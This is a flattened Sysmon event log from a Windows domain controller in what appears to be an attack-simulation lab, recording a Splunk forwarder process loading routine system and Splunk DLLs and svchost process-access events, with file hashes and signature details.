13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098451Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098450Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098449Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000098448Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.072{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x800000000000000098447Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.072{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x800000000000000098446Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.072{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x800000000000000098445Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.072{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x800000000000000098444Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.072{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x800000000000000098443Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.072{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x800000000000000098442Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.072{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x800000000000000098441Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.057{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x800000000000000098440Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.057{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x800000000000000098439Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.057{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x800000000000000098438Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.057{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000098437Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x800000000000000098436Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x800000000000000098435Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x800000000000000098434Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\winspool.drv10.0.14393.5125 (rs1_release.220429-1732)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=B2906606F5996AC73714F1910DB63626,SHA256=6BC9B694C275405A54CA8116C4D2BAD2ECA39B28B34B04358818059D743A572F,IMPHASH=396555AAEAB1402915E17EE8C257B7CFtrueMicrosoft WindowsValid 734700x800000000000000098433Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000098432Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x800000000000000098431Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x800000000000000098430Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x800000000000000098429Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x800000000000000098428Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x800000000000000098427Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x800000000000000098426Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000098425Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000098424Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x800000000000000098423Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x800000000000000098422Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x800000000000000098421Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x800000000000000098420Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000098419Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x800000000000000098418Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000098417Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x800000000000000098416Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x800000000000000098415Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000098414Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098413Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 10341000x800000000000000098412Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000098411Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000098410Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x800000000000000098409Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 